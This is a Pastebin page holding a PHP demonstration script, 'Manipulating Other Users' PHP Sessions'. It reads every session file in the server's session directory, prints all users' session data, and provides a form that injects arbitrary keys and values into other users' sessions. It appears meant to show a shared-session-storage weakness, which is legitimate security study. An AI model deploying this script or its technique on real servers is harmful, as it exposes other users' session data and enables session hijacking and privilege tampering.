Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // The "unserializesession" function is from
- // http://www.php.net/manual/en/function.session-decode.php#101687
- function unserializesession( $data )
- {
- if( strlen( $data) == 0)
- {
- return array();
- }
- // match all the session keys and offsets
- preg_match_all('/(^|;|\})([a-zA-Z0-9_]+)\|/i', $data, $matchesarray, PREG_OFFSET_CAPTURE);
- $returnArray = array();
- $lastOffset = null;
- $currentKey = '';
- foreach ( $matchesarray[2] as $value )
- {
- $offset = $value[1];
- if(!is_null( $lastOffset))
- {
- $valueText = substr($data, $lastOffset, $offset - $lastOffset );
- $returnArray[$currentKey] = unserialize($valueText);
- }
- $currentKey = $value[0];
- $lastOffset = $offset + strlen( $currentKey )+1;
- }
- $valueText = substr($data, $lastOffset );
- $returnArray[$currentKey] = unserialize($valueText);
- return $returnArray;
- }
- // The "session_raw_encode" function is from
- // http://www.php.net/manual/en/function.session-encode.php#76425
- function session_raw_encode( $array, $safe = true ) {
- // the session is passed as refernece, even if you dont want it to
- if( $safe )
- $array = unserialize(serialize( $array )) ;
- $raw = '' ;
- $line = 0 ;
- $keys = array_keys( $array ) ;
- foreach( $keys as $key ) {
- $value = $array[ $key ] ;
- $line ++ ;
- $raw .= $key .'|' ;
- if( is_array( $value ) && isset( $value['huge_recursion_blocker_we_hope'] )) {
- $raw .= 'R:'. $value['huge_recursion_blocker_we_hope'] . ';' ;
- } else {
- $raw .= serialize( $value ) ;
- }
- $array[$key] = Array( 'huge_recursion_blocker_we_hope' => $line ) ;
- }
- return $raw ;
- }
- function get_sessions()
- {
- $sessions = array();
- $iterator = new DirectoryIterator(session_save_path());
- foreach ($iterator as $item)
- {
- if ($item->isFile())
- {
- if (substr($item->getFilename(), 0, 5) == 'sess_')
- {
- $session_id = substr($item->getFilename(), 5);
- $sessions[$session_id] = unserializesession(file_get_contents($item->getPathname()));
- }
- }
- }
- return $sessions;
- }
- session_start();
- if (
- isset($_POST['session_id']) && is_string($_POST['session_id']) &&
- isset($_POST['key']) && is_string($_POST['key']) &&
- isset($_POST['value']) && is_string($_POST['value'])
- )
- {
- $sessions = get_sessions();
- if (array_key_exists($_POST['session_id'], $sessions))
- {
- $sessions[$_POST['session_id']][$_POST['key']] = $_POST['value'];
- file_put_contents(session_save_path() . DIRECTORY_SEPARATOR . "sess_{$_POST['session_id']}", session_raw_encode($sessions[$_POST['session_id']]));
- }
- }
- elseif (isset($_POST['destroy_this_session']))
- {
- session_destroy();
- session_start();
- }
- $_SESSION['user_agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
- session_write_close();
- $sessions = get_sessions();
- ?>
- <!DOCTYPE html>
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>Manipulating Other Users' PHP Sessions</title>
- </head>
- <body>
- <h1>Manipulating Other Users' PHP Sessions</h1>
- <p>Instructions: open this PHP script in at least two different browsers and mess around with each other's sessions.</p>
- <p><code>session_save_path() = <?php echo session_save_path(); ?></code></p>
- <p>This browser's session ID: <code><?php echo session_id(); ?></code></p>
- <h2>Current Session Data</h2>
- <pre><?php print_r($sessions); ?></pre>
- <hr>
- <?php
- if (count($sessions) == 1)
- {
- echo '<p>You must visit this page with another browser in order to continue on.</p>';
- }
- else
- {
- ?>
- <p>Choose a session ID and enter the key and value you'd like to inject into their session.</p>
- <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
- <select name="session_id">
- <?php
- foreach ($sessions as $session_id => $session_data)
- {
- if ($session_id == session_id())
- {
- continue;
- }
- echo "<option value=\"$session_id\">$session_id</option>";
- }
- ?>
- </select>
- <label for="key">Key:</label> <input type="text" name="key" id="key">
- <label for="value">Value:</label> <input type="text" name="value" id="value">
- <input type="submit" value="Submit">
- </form>
- <?php
- }
- ?>
- <hr>
- <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
- <input type="hidden" name="destroy_this_session" value="true">
- <input type="submit" value="Destroy This Browser's Session">
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement